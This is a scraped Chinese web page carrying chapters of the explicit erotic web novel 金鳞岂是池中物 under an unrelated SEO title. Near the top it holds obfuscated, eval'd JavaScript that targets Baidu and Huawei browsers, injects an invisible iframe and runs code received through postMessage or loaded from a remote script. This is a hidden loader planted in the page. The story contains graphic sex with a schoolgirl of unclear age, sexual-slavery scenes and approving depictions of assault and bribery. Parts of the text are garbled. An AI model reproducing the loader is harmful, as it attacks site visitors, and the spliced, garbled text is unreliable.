军旅高干文小说_灌顶的时候哭了

撩妹情话 情话解析 2021-02-22 14:06:55 18 0
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
快捷c作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 ;amp;quot;收藏到我的浏览器;amp;quot; 功能 和 ;amp;quot;加入书签;amp;quot; 功能!荒苎源n揖驼遗笥呀枇艘徽拧徽派楣馀蹋锩娴呐司褪钦庋模摇蚁胝庋芄灰戳税桑媸堑模巍胃纾摇摇闱虮鹛盅嵛野 br /看女孩儿急得都快哭出来了,侯龙涛赶紧又把她抱住,吻着她的额头,“傻瓜,我怎么会讨厌你呢,你这么做不也是为了我嘛,对不对?”“嗯。”“我就喜欢你清清纯纯的样子,就喜欢每次我一脱你的衣服,你就会又羞又怯的往我怀里钻。”“是啊,是啊,”薛诺嘟着嘴,“我是真的害羞嘛。”“我知道,所以纯棉的少女内衣裤最配你的年龄和性格了。”侯龙涛边亲着她边揉捏着她的臀r,“宝宝,你的小p股真柔软,我怎么老也摸不够啊?”“去你的。”薛诺终于又笑了出来,“啊!”突然感到男人把夹在自己臀缝中的布条拉了出来,有一根手指从后面温柔的c入了自己的小x中,“啊…涛哥…嗯…”女孩儿微摇着p股,合上眼帘,把男人的舌头接入檀口。侯龙涛右手抬起美少女的左大腿,左手在她的耻骨上搓捏。“啊…嗯…”薛诺的p股摇得更厉害了,“嗯…涛哥…”想伸手去够爱人的性器,却又被抓住了双臂。男人将她的双臂推起,举过头顶,胸前的两团嫩r被拉伸成了很漂亮的形状。薛诺感到自己的茹头被爱人含进了口中,一条又湿又腻的舌头在敏感的茹晕上画着圆,奶尖被挑拨的一跳一跳的,甜美的电流使自己浑身无力。她真的好想现在就和爱人合为一体,可又不好意思主动开口,“涛哥…”侯龙涛对这个小美人儿的身体再熟悉不过了,放开她的双臂,双手托住她的p股,将两个圆圆的臀瓣向两边分开,有一根手指勾在了内k上,撤去了红润的小x的保护物。缓缓将少女下放,粗长的yj一点儿一点儿的消失在她的身体里。“啊…啊…嗯…好热…好大…”薛诺双手扶着男人的肩膀,大y唇、小y唇、yd前段、yd后段逐一被温柔的撑开,她能真切的体会到那种身心被爱人侵蚀、占有的满足感…“涛哥,几点了?”薛诺懒洋洋的偎在爱人怀里。男人拿起床头柜上的表看了一眼,“快六点了。”“啊?”少女赶忙起身,冲进浴室里,开始穿衣服,“要来不及了,第一天可不能迟到啊。”侯龙涛跟进去,“什么第一天?你有急事儿吗?”“我在阜成门的麦当劳找了一份小时工,今天是第一天,六点上班儿。”女孩儿正在匆匆忙忙的提裤子。“你为什么要去打工啊?”“你知道的,我家的钱都被那个混蛋骗走了,现在工作又那么难找,我妈还没找到,虽然她嘴里说没关系,可我已经不小了,应该分担家里的责任了。涛哥,你送我去吧。”侯龙涛走过去,一把将衣衫不整的美少女横抱起来,又回到了卧室里,搂着她坐在自己腿上,“别去了。”“涛哥,别闹了,我真的要晚了。”薛诺轻轻的挣扎起来。“嘘…”男人在她脸上亲了一下儿,“你又要上学,又要训练,又要做我的小妻子,哪儿还有时间打工呢?”“可是…可是…”“没什么可是的,”侯龙涛从床头柜的抽屉里拿出一张磁卡,“这个你拿去给你妈妈,里面有二十万。”“我不能…”“嘘…听我说,”在美少女的香唇上轻啄着,“你是我心爱的女孩儿,照顾你们母女俩是我的责任,我决不会让你们受苦的,我会永远永远保护你们。”“涛哥…”薛诺紧紧抱住爱人的脖子,眼泪夺眶而出,“可…可我妈妈不会接受的。”“你告诉她,这是上回网吧执照的钱,公买公卖。”侯龙涛抚摸着女孩儿的柔发,他刚才的每一句话都是发自内心的…把薛诺送到她家楼下,“你妈妈这几天心情怎么样?”“她白天都好好的,可我知道她是装出来的,是不想让我担心,她心里一定很苦的。”少女忧伤的说。“我知道怎么能让她开心起来。”“真的?”“再给她找一个男朋友。”“那样行吗?”“放心吧,我会帮她留意的,相信我,绝对管用。”侯龙涛显得胸有成竹。“那就全拜托给你了。”薛诺对这个男人的话早就没有一点儿怀疑了,“你要不要上去看看我妈妈?”“还是不要了,再过一段儿吧,我怕她这么快见到我会尴尬的,你知道,那些照片儿。”女孩儿想了想也对,就没再坚持…几小时后,薛诺学校所在地的派出所里,正有一个警察在向所长作着汇报,“根据目击者提供的线索,我们已经找到了其中一辆供案犯逃跑的出租车。经过询问,证实司机并不是他们一伙儿的。据他说,那些人在车上都是一言不发,开出不到五公里,他们就下车了,换了另一辆出租车,他并没记住车号儿,所以哪儿是案犯的最终目的地就不得而知了。”所长点点头,“就算他记住了也不一定有用,看样子案犯是有预谋的,他们很有可能会多次换车。那个被打的那边儿有什么吗?”“受害人叫张越,是一个经常在咱们辖区内惹事生非的小流氓,案发时跟他在一起的三个人也都是这片儿的小痞子。照我看,他们八成知道是谁干的,只是不敢说,或是想要自己解决。”“哼,那这案子的性质就是流氓打流氓喽。他们那种人最好就是自相残杀干净了了事儿,他不要咱们c手最好。”“对了,刘所儿,我去医院做笔录的时候,已经有一个朝阳分局的科长在那儿了,说是受害人的舅舅,我看有可能是他不让受害人说的,大概他是要…”“切,摆明了是小看咱们派出所的办案能力,好啊,分局的牛x啊,他有能耐替外甥报仇,就让他去吧。这案子就当陈案锁起来吧。”那个所长在案卷上签上了名字…第三十三章完金鳞岂是池中物 作者:monkey第三十四章 初露端倪 11/30/2002侯龙涛盘腿儿坐在床上,面前放着一台笔记本儿电脑,正在浏览网上的体育新闻。“我尻。”突然看到一条让他感兴趣的消息,“有‘goldbird(金雀儿)’、‘euroangels(欧洲天使)’之称的三名罗马尼亚女子体c选手米洛舍维奇、科琳娜、克劳蒂亚在日本宽衣解带,不仅以l体上了日本杂志封面,还拍摄了两部l体dvd‘金牌的女妖精们’和‘欧洲天使’,每人的报酬为四万美元。”文章还分别对三人做了介绍,二十六岁的米洛舍维奇曾在一九九二年巴塞罗那奥运会获得跳马和蹦床两枚金牌;二十二岁的科琳娜连续在1997年及1999年世界体c锦标赛为罗马尼亚拿下团体金牌,还在2000年悉尼奥运会中夺金;克劳蒂亚虽然没有前两人的名气大,但也是罗马尼亚的顶级选手。上面还附了一张杂志的照片儿,三名典型的东欧美女穿着透明的紧身衣,双腿间没有y影,显然是平时为了穿体c服,把ym都刮了,上身也是两点尽露。若论性感指数,当属成熟丰满的米洛舍维奇最撩人,但科琳娜也毫不逊色,训练有素的身材凹凸有致,宛如希腊神话中的维纳斯女神。另一篇相关文章报导,三人的做法激怒了国际体c联合会,险些禁止罗马尼亚参加一切国际大赛,直到罗国的体协做出禁止米洛舍维奇等三名前奥运奖牌得主五年内从事官方的教练和指导活动,但可以担当私人教练的处罚决定后,才算暂时平息此事。“c,怎么有的女人就这么不自重呢。给你四万美金,让你拍全l的电影,你干吗?”侯龙涛扭头问从浴室中走出来的任婧瑶。只穿着蕾丝内衣裤,正在擦着湿露露的头发的女人听他这么一问,赶忙扔下毛巾爬上床,跪在赤l着上身的男人背后,按捏着他的肩膀,“不干,我的身子只给主人一个人看,别人出再多的钱,我也不会同意的。”“哼哼,越学越乖了,知道该怎么拍马p了。好,让我尝尝你的嘴巴是不是真的这么甜。”侯龙涛把舌头伸出来动了动。任婧瑶识趣儿的探过头,把它含进嘴里吸吮,涂着亮唇膏的双唇和男人的双唇亲密的磨擦。“好了,”侯龙涛收回舌头,“给我拿根儿烟。”“嗯。”女人从床头柜上的烟盒儿里拿出一颗,放进男人的嘴里,又给他点上,把一个烟灰缸放在他身边,继续帮他按摩肩膀。自从屈服于这个男人的y威下之后,任婧瑶的大小姐脾气已经被消磨的不见踪影了,就连她的父母都夸她懂事儿了不少,晚上也不出去乱跑了。当然他们并不知道女儿是因为做性奴所激发出的奴性,才会变得很听话的。“后t洗干净了吗?”侯龙涛的烟快抽完了,新闻也快看完了。“啊,洗干净了。”女人知道快到sex time了,低头开始在男人的脖子和肩膀上亲吻、舔舐。侯龙涛把笔记本儿合上,轻轻一扔,让它落到了边儿上的小沙发上。把身后的女人拉到自己腿上躺下,左手托住她的后脑,低头舔吮她伸出来的粉舌,右手推开她的r罩,在她傲立的两座r峰上轮流揉捏,掐揪她硬挺的茹头。虽然在名义上是性奴,但任婧瑶心里明白,只要自己对这个男人忠心外加完全的服从,基本上能够享受到女朋友所能享受到的一切待遇。闭着眼睛,双手揽住男人的脖子,两条舌头一会儿在口外交缠,一会儿进入一个人的嘴中搅动,两人的唇边都已涂满了闪光的津y。“去,让我检查一下。”侯龙涛放开女人的身体,把嘴边的唾y抹掉。任婧瑶听话的下了床,背对着男人站好,上身前曲,双腿分开,绷得笔直,两手扶住小腿肚子,把p股撅的老高。男人坐在床边,十根手指都陷入了丰满的臀r中,“啧啧啧,看看这个p股,又圆又白又嫩又有弹性,你怎么长出一个这么漂亮的p股的?”说着就把女人的小内k拉到了膝盖处。“我这…我这全是为了主人,我就是为了取悦主人而生的,我的p股当然也是为了取悦主人而长的。”任婧瑶已经很习惯说这种话了,甚至有点儿喜欢说这种话,把自己的命运完全交到一个强有力的男人手里,对一个女人来说,不失为一种不错的选择。“好好,知道该怎么讨我欢心,你上学那会儿要是有现在一半儿机灵,成绩一定比我好。”侯龙涛分开面前的臀瓣,用舌尖在浅褐色的菊花蕾上轻点,双手还不住的揉动嫩滑的p股,一股股裕y的香味儿混着女人本身的r香很是挑人情欲。“我再机灵也不会比主人聪明的。”“啪”任婧瑶的p股上轻轻挨了一下,“哼哼哼,不用每句话都拍马p,现在是咱们亲热的时候,叫床比说好话更能让我高兴。”手指c入了由于刚才的接吻和摸r而已经湿润了的yd,“怎么样?感觉到我的手指了吗?”“啊…啊…感觉到了…感觉到了…好痒…啊…主人…主人你好会抠啊…呀…抠到zg了…啊…”任婧瑶的双腿开始不自觉的颤抖。侯龙涛把女人的p眼儿舔的湿湿的,另一手的手指沾上她流出来的y水儿,挤入g门中。yd中的手指向上挑,直肠中的向下压,隔着两层腔壁互相搓动。女人抖动的更厉害了,胸前吊着的两个茹房也随着摇摆起来,“主…主人…啊…受…受不了了…要…要…站不稳了…啊…啊…啊…”侯龙涛抽出双指,右臂揽住她两条雪白的大腿,稳住她的身体,左手撑开她的大y唇,舌头c进小x里快速的伸缩。“呀…主人…给…给我吧…求…求求您了…啊…太美了…”“好吧,”男人抬起头,放开任婧瑶,“你知道东西在哪儿吧?”女人的身体失去了依靠,腿一软,跪倒在地,“我…我知道…”跪爬到电视柜前,从抽屉中取出一瓶润滑y,又爬了回来。任婧瑶跪在侯龙涛双腿间,抬起纯洁的脸庞,清澈的双眸中充满了乞怜的神情,帮男人解开裤子,掏出硬梆梆的yj,埋头“唔唔”的吮了几下,把润滑y倒在手心上,如手y般涂满男人的大j巴,“主人,准备好了。”侯龙涛摸了摸跨见那张少见的清纯俏脸,“那还不躺好,小s货。”任婧瑶起身,先把男人唇边粘着的体y舔去,然后才躺到床上,p股贴着床沿儿,双腿举起,两手伸出,扒开自己的臀瓣,“啊,主人,清您来摘我的后t花吧。”侯龙涛站起来,抓住女人的两个脚腕儿,在她的左脚心上若有若无的舔了两口。“啊…痒…痒…主人…嗯…”五根漂亮的脚趾蜷缩了起来,在脚心形成可爱的皱纹。男人扶住自己的阳具,双膝抵住床沿儿,臀部一用力,如半个j蛋般的g头就挤入了美女的g门中。借着润滑y的帮助,再加上不是第一次和这个女人g交,粗长的yj慢慢全部捅了进去,“嘶…啊…好紧的小p眼儿,好棒的后t,啊…再夹紧一点儿,好,爽死老子了,嗯…嗯…真是极品的后t花。”侯龙涛一边抽c,一边赞美,c干的速度逐渐加快。任婧瑶躺在那儿,皱眉闭目,“谢谢…谢谢主人,嗯嗯…主人的j巴…好有力…”从紧咬的牙关中断断续续的挤出一句感谢的话,每一次的c入和抽出都让她有一种五脏六腑都被带动的感觉。侯龙涛在女人的g门里搞了半个多小时,女人的身体被他撞进了床里,他也变成了跪在床上,上身挺得笔直,双臂抱着竖起的两条大腿。狭窄的直肠和g门口处的括约肌紧箍着他的r棒,令他舒爽无比,真是越c越有劲,越c越畅快,“好,好,真是好p眼儿,真是好p眼儿啊。”由于用力过猛,在一次抽出时,yj脱出了女人的后t,侯龙涛借势一提身子,“噗”的一声杵进了任婧瑶的x缝中。“啊!”任婧瑶欢叫一声,猛然睁开的眼中闪烁着快乐的光芒,“主人…丢了…啊…啊…”娇嫩的zg开始慷慨的泄出y精。男人放开她的双腿,改为掐住她的纤腰,飞快的活动着腰臀,c干的幅度变小了,频率却增大了,g头如雨点般落在正处于极度兴奋、极度敏感中的zg上,“c死你,我c死你,s娘们儿,看我不干到你脱精的。爽不爽?老子搞的你爽不爽?”“主人啊…c我…c死我吧…啊…爽…爽上天了…嗯…啊…啊…啊…”任婧瑶简直快要疯狂了,双腿夹住男人的腰,身体开始像蛇一样扭动,一直抓着床单儿的两手移到了双r上,边捏揪着茹头,边揉搓着乃子。侯龙涛一次接一次的s精,又一次接一次的勃起,直到任婧瑶因为丢了太多的y精而昏迷不醒,才把她抱进浴室里,放了一大缸泡泡浴,把她放进去,自己又冲了个淋浴,才气定神闲的回到屋里,靠在床头看电视。“妈的,什么性奴,还得让我伺候。”看着看着电视,侯龙涛突然觉得自己对任婧瑶有点儿太好了,可他的本性就是如此,也真是无可奈何啊。过了一会儿,任婧瑶从浴室中出来了,躺上床,抱住男人,“谢谢主人帮我放水。”“嗯。”“我能问主人个问题吗?”“问吧。”“今天您都是s在我的嘴里和后t里,为什么没s在我的小x里呢?”“我他妈s在你哪个眼儿里是我的事儿,轮得到你选吗?”“不…不,我不是这个意思,我…”女人以为他生气了,害怕的跪到他身边。“你今天又不是安全期,老吃避孕药对身体不好,我不s在你x里,你不是就不用回家吃药了嘛。”侯龙涛看都没看她。“主…主人…”任婧瑶又趴下抱住男人的脖子,她终于知道了,这个男人并不像自己想像的那么冷酷,还是对自己蛮关心的。她现在的感觉就像是自己的男朋友虽然很厉害、很暴躁,但却很值得自己追随。男人看了一眼表,拍了拍美女的后背,“行了,别腻了,我的兄弟们快来了,去把衣服穿上。”“不嘛,再抱一会儿吧。”“什么?”侯龙涛不太相信自己的耳朵,“你他妈给鼻子就上脸啊,刚跟你说几句好话,你就不知道自己什么身份了。是不是今天没打你,你皮痒痒啊?”“是,是。”任婧瑶高兴的爬到床尾,把p股撅起来,摇来摇去,回过头,“主人来打吧,来让你的小性奴尖叫吧。”“c,”侯龙涛笑了出来,“你可真他妈是够贱的。”“啪”抡圆了给了那白花花的大p股一巴掌…天伦王朝的一间套房里聚了六男一女,显得有点儿拥挤,“老七怎么还不来啊?”大胖等烦了,“猴子,你刚才给他打电话,他到哪儿了?”“已经过了中山公园儿了,我跟他说直接到楼下的“天伦阁”找咱们。你丫就跟p股上长钉子了一样,走吧,走吧。”侯龙涛搂住任婧瑶的腰,在头前开路。几个人刚刚落座,文龙就找进来了,“对不起,对不起,来晚了,在他妈西单路口堵车了。四哥,昨儿我干得还算干净吧?”“行,挺利索的。”“什么事儿,什么事儿?”抵不住马脸的“问”,文龙把昨天勊人的事儿说了一遍。“c,不仗义,有这种事儿不叫我。”马脸不高兴了。“有文龙就够用了,叫那么多人干吗?”“你丫老这儿样,用人的时候就想不起我,分明就是看不起我。”马脸满脸的官司,看来是真的生气了。“行了,行了,行了,谁说我有事儿就想不起你的,我今儿就有事儿要你帮忙。”“好,你说,能办的我一定给你办。”“不用急,先吃饭。”侯龙涛把刚刚被“轰”出去的服务员又叫回来了,“小姐,上菜吧。”武大是个不爱惹事儿的人,等小姐出去后才发言,“猴子,你下手是不是太重了?教训教训他就完了,用得着让他四肢尽断吗?”“二哥啊二哥,那小子满脑子里想的就是怎么搞我的女人,我要是光把他打个鼻青脸肿,你猜他会用什么办法来报复我,他会觉得我就是一个跟他同一档次的小痞子,就算他找不到我,他也会再找我的女人的。那样的话,不光一点儿效果也没有,还会让他的行为更过激。”“那现在怎么样?他不敢再找薛诺了吗?”“他有那胆子吗?第一次惹我,我就让他断胳膊断腿,三个月的医院住起来可不舒服,我看他还不想死呢。”“那小子的舅舅不是朝阳分局的一个科长吗?”“没什么好担心的,感谢他那个傻侄子,把他的身份高呼了出来,他现在只能公事公办,可又没有证据。”侯龙涛做出一个哭丧脸儿。“你就不怕他会用你对付德外四虎的那种办法对付你?”“我不会给他那种机会的,他是警察,他明白,要想给我这种人按上一个就地正法的罪,哼哼,难啊。好了,别说这事儿了,吃饭,吃饭。”丰盛的晚餐已经摆上了桌。酒足饭饱,侯龙涛点上一根儿烟,“婧瑶,去商场挑两套衣服吧。”任婧瑶知道他要谈正事儿了,起身在男人的脸上亲了一下,“主人,那待会儿我就直接回家了。”“嗯,我下礼拜再找你。”“二哥,我需要两亿的贷款,越快越好,你什么时候能给我批下来。”“什么?两亿?你要干什么?”武大吃了一惊。“我新买的那个专利要上马,厂房、设备都要资金,尤其是主生产线,要从德国进口,我的美金全套在那个冻结的账户里了,还得去黑市上兑换,所以要尽快,我赔不起时间。”“你不会从你们公司取啊?你那个富婆不是什么都听你的吗?”“我不想把她扯进来,这个项目风险很大,单从商业角度讲,我们公司是不会投资的,要是我从公司拿钱,万一搞砸了,会对她很不利的。”“你就不怕对我不利?”武大一乐,“真他妈重色轻友。”“有什么对你不利的,就算万一我赔了,两亿的呆坏帐对于银行算个p啊。再说我可以抵押贷款,你让你们行的评估部给我的专利估个两、三亿的,贷出个两亿来,你一点儿风险也没有。我不像你,我办事儿有准儿,不会让你受损失的。”“你丫这叫什么话,不就是把你的钱多存了几个月嘛,又不是不给利息,还抓住不放了。得,这事儿我给你办就是了。”贷款算是落实了。“猴子,厂房和厂址我都可以给你提供。”刘南说话了,“我舅舅的公司在‘易庄’经济开发区有一处五千平米的闲置厂房,外加一栋职工宿舍楼,你象征性的给点儿租金就行,但是生产和经营许可证就得你自己解决了。”“我c,三哥,那敢情好。那两证儿我已经让我们公司的人去办了,他们常年和有关部门打交道,关系搞得都不错,一准儿能搞定。二德子,我需要你和三哥帮我策划一个广告,再和央视的广告部联系,用你老头的影响尽量压价,至于内容,我改天再到你们公司详谈,怎么样?”“嗯嗯,没问题啊。”二德子还在吃着。“大哥,文龙,你们能不能从你们的人里找几个既忠心又能打的?我要他们负责厂区和门市保安,但不要那种爱惹事儿的。”“好说,一句话的事儿。”大胖和文龙答应的很干脆。“嗨嗨嗨,你看你看,我就说看不起我吧。大家都有份儿,就是放着我不用。”马脸又吵吵起来了。“急什么,”侯龙涛笑了笑,“做生意最重要的是赚钱,可怎样才能保证挣钱呢,那就全靠你了。”“真的?快说快说。”马脸兴奋了。“我的产品成本为三百元,加上工人的工资等等开销,大约在五百元上下,销售价定为九百九十九,所以每卖出一件,就是五百元的盈利。现在北京市的机动车总量已经超过了一百八十万,还在以每年二十万辆左右的速度增长。你想想,如果每辆车都按上我的产品,那是多少呢?”“五乘十八,五乘十八,九千万!”“九亿。”“九亿!?”“我跟昂扬说过了,照专利证书上写的,这个产品能使用四年,我要他在质检时做点儿猫腻,将使用年限检测为三年。这样的话,光北京市,每年平均的盈利就有三亿,你们都会在我的公司挂名,每年百分之五的分成,你算算是多少。”侯龙涛喝了口水,润润喉。“一千五百万…”几个人异口同声的喊了出来。“关键在于怎么才能让全北京的每辆车上都安装我的产品,答案就是‘行政指令’。但凡市委市政府发布这么一条行政指令,那就万事大吉了。”“那怎么叫全看我了?”马脸不解的问。“我需要交管局的全力支持,这种车辆管理的问题,只要交管局通过,再加上有充足的理由,市委市政府是一定会通过的。我记得你老头是从交管局调出来当大队长的,他应该在局里有不少老朋友吧?”“噢…”马脸恍然大悟,“但有一条,我家老头现在算‘外官儿’,说起话来不太硬气。交管局配置一个正局长,两个副局长,因为原市公安局局长张良基被撤职,交管局的局长被调到市公安局做局长了,原来的一个副局长升为了正局,有一个副局的位子一直空着,市里的意思是从各城区的交通队大队长里选一个补上。”“你家老头有戏吗?”“现在的情况是怎么招啊,新局长是我老头同期毕业的,俩人还是一个班的,关系铁的很,他是想提我老头。可他妈那个副局的意思是宣武大队的刘江,丫那又在交管局里有点儿势力,正局就不好直接拨他的面子,他就把俩人全报上去了,让市里决定。”“那就是难说了。”“是呀,明年初任命,要是我老头当了这个副局,你再给正局点儿好处,你要的行政指令跟本不成问题。”“好,我一定想办法让你家老头胜出。宣武的刘江,怎么才能搞掉你呢。”侯龙涛抱着双臂,眯起眼睛,陷入沉思。手机响了起来,“喂。”“涛哥,刚刚…刚刚…有两个警察带着一个张越的朋友来我家找我,问张越的事儿。”是薛诺的声音。“好诺诺别急,慢慢说。”“他们问我你的住址,我没告诉他们,只说你住在天伦王朝。涛哥,你出什么事儿了?”听得出她很担心。“没事儿的,你放心吧。乖,真的没事儿的。”收起电话,“来得好快啊。”“怎么了?”坐在边儿上的文龙问。“张越的事儿。文龙,你先走吧,其它人跟我上楼。”回房后,侯龙涛把一个小录音机放进裤兜里。不一会儿,就有两个警察和一个小孩儿来了,“就是他。”那个小孩儿指了指侯龙涛。“我们是朝阳分局的,请你跟我们回局里协助调查一桩严重伤害案。”一个警察出示了自己的证件。“好,我跟你们走。”侯龙涛穿上大衣,又回过头来,“大哥,你们开车在后面跟着,给如云打个电话,说我被警察带走了,告诉她不知道为什么,她知道怎么做的。”说完就在警察一前一后的“护卫”下走了出去…第三十四章完金鳞岂是池中物 作者:monkey第三十五章 旧恨新仇(上) 11/30/2002-12/1/2002一天前,当朝阳公安分局特行科科长杨立新看到四肢全打着厚厚的石膏的外甥躺在病床上,满脸的痛苦神情,自己的妹妹和妹夫守在床前,都是眉头紧锁时,真是心如刀绞。咬牙切齿的问:“是谁干的?舅舅一定给你报仇。”张越勉强睁开眼睛,“我不知道,不知道是谁干的。”“什么?你连谁打的你都不知道?”“我…我从来没见过那帮人,他们是突然从出租车里冲出来把我打成这样的。”“你想想,最近有没有得罪什么人。”“没有啊,您知道我的,我平时都是老老实实的,从来不惹事儿,哪儿会得罪人啊。”张越把自己说的好无辜,家里人都不知道他是个小流氓。“兴许是薛诺的那个什么涛哥找人干的。”一个一直陪着张越的小崽儿突然c嘴。“啊,对,一定是他。”经人一提醒,张越也觉得八九不离十,“今儿下午他一直在边儿上看着来着。”“没错没错,我还看见那个跟你说话的人冲他点了一下儿头呢。”“你们把事情从头到尾给我说清楚一点儿。”杨立新听两个孩子你一言我一语的,根本找不着门道儿,“越越,你慢儿慢儿说,一点儿细节也别落下。”张越把两次和侯龙涛见面的经过说了一遍,当然描述的并不很详尽,隐瞒了自己挑起事端和对薛诺图谋不轨的事实,“我是真的很喜欢那个女孩儿,就是想和她多说几句话,谁知道那个人会对我这样。”“太嚣张了,”杨立新气怒的一捏床栏杆儿,“他叫什么,是干什么的?”“不知道。”“没关系,可以从那个叫薛诺的女孩那儿问出来。要是有派出所的人来给你做笔录,你就说什么都不知道,这件事儿我亲自给你办。无法无天的王八蛋,打了我外甥,我要你好看。”杨立新真没把那个不知名的对手放在眼里。以他的想法,对方虽然下手很重,但既然会用这种街边儿打架斗殴的方法解决,就一定是上不得台面儿的下九流,充其量就是有点儿黑社会背景的小地痞,以他这个分局的科长身份,绝对能把对方整的苦不堪言…星期六一早,两个朝阳分局的警察就在杨立新的授意下,带着一个当事的小崽儿去找薛诺。可扑了个空,女孩儿正好和她的母亲出去买东西了。等到下午5:00多才算见到面,等杨立新得到了侯龙涛的姓名、住址时,已经快7:00了。本来他要是早上就收到消息,可以有充分的时间对侯龙涛的底细进行一下调查,但现在已是周六的晚上了,他又报仇心切,不想让仇人安安稳稳的过周末,干脆指示那两个警察直接去传人。他是被怒火冲昏了头脑了,也不想想,如果侯龙涛真如他所想,是一个普通的地痞流氓,怎么会住在五星级的天伦王朝呢…侯龙涛坐在警车里,“你们找我有什么事儿吗?”“只知道是一件严重伤人案,别的我们都不清楚,我们就是负责把你接到局里。”一个警察回答道。“你们这算是拘留我吗?”“当然不算了,连手铐都没给你戴,不是跟你说过嘛,是协助调查。”“就是再确认一下儿。”侯龙涛心里更有底了。到了朝阳分局,被带到二楼的一间审讯室里,“坐这儿等会儿吧。”带他来的警察指了指屋子中间长桌前的一张椅子,说完就出去了。侯龙涛观察了一下儿这间屋子,y森森的,前面一扇门,后面一扇门,上面连个窗口都没有,只在屋顶上有一个通风口。“妈的,要不是我早有打算,就算是要在这儿把我大卸八块儿也不会有人知道的。”侯龙涛掏出一根儿烟点上,又把录音机打开了,压缩技术的磁带,可以不停的录音七十二小时,现在就打开也不怕会用光。有三个警察从身后的铁门走了进来,侯龙涛漫不经心的回头瞟了他们一眼,也没看清长相。其中一个警察走到长桌另一边儿,“你叫侯龙涛?把头抬起来。”“你们找我来协助调查,还这么不客气…”一抬头,两个人全是一惊,竟然是老相识了。大约九年以前,才过十五岁的侯